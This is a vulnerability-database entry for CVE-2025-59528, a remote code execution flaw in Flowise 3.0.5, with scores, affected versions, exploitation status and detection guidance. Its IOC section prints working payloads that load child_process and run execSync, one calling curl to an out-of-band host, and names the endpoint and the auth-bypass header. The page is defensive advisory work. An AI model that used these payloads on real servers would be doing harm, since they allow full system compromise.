cbcvebase.
CVE-2025-59528
published 2025-09-22

CVE-2025-59528: Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5, Flowise is vulnerable to remote code execution. The…

PriorityP195critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
90.18%
99.8th percentile
Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5, Flowise is vulnerable to remote code execution. The CustomMCP node allows users to input configuration settings for connecting to an external MCP server. This node parses the user-provided mcpServerConfig string to build the MCP server configuration. However, during this process, it executes JavaScript code without any security validation. Specifically, inside the convertToValidJSONString function, user input is directly passed to the Function() constructor, which evaluates and executes the input as JavaScript code. Since this runs with full Node.js runtime privileges, it can access dangerous modules such as child_process and fs. This issue has been patched in version 3.0.6.

Affected

3 ranges
VendorProductVersion rangeFixed in
flowiseaiflowise
flowiseaiflowise
flowiseaiflowise>= 3.0.5 < 3.0.63.0.6

Detection & IOCsextracted from sources · hover to see the quote

url/api/v1/node-load-method/customMCP
command({x:(function(){const cp=process.mainModule.require("child_process");cp.execSync("curl {{interactsh-url}}");return 1;})()})
command({x:(function(){const cp = process.mainModule.require("child_process");cp.execSync("{cmd}");return 1;})()})
otherx-request-from: internal
versionFlowise 3.0.5
sigma
matchers: dsl: contains(interactsh_protocol, "dns") AND contains(content_type, "application/json") AND contains(body, "No Available Actions") AND status_code == 200
  • Monitor POST requests to /api/v1/node-load-method/customMCP with a JSON body containing 'mcpServerConfig' field holding JavaScript function expressions (e.g., patterns like '({x:(function(){' or 'process.mainModule.require')
  • Flag requests to /api/v1/node-load-method/customMCP that include the header 'x-request-from: internal', as this header is used by exploit code to bypass authentication checks
  • Exploitation activity has been observed originating from a single Starlink IP address; monitor for scanning/exploitation attempts from Starlink IP ranges against Flowise endpoints
  • The Nuclei template for this CVE checks for 'No Available Actions' in the response body after posting to /api/v1/node-load-method/customMCP — a successful exploit response indicator
  • Exploitation requires authentication (JWT token via /api/v1/auth/login); monitor for sequential login followed immediately by POST to /api/v1/node-load-method/customMCP as a behavioral chain indicator
  • ·The vulnerability exists in Flowise versions >= 2.2.7-patch.1 and up through 3.0.5; the Metasploit module targets a broad version range, so version fingerprinting is important for accurate scoping
  • ·Exploitation requires only an API token (authenticated), not unauthenticated access — detection rules should account for the authentication step preceding the exploit payload delivery
  • ·Between 12,000 and 15,000 Flowise instances are exposed online; it is unclear what percentage are running vulnerable versions, so broad network-level detection is warranted
  • ·CVE-2025-59528 exploitation is observed alongside two other actively exploited Flowise flaws (CVE-2025-8943 and CVE-2025-26319); detection coverage should address all three

CVSS provenance

nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.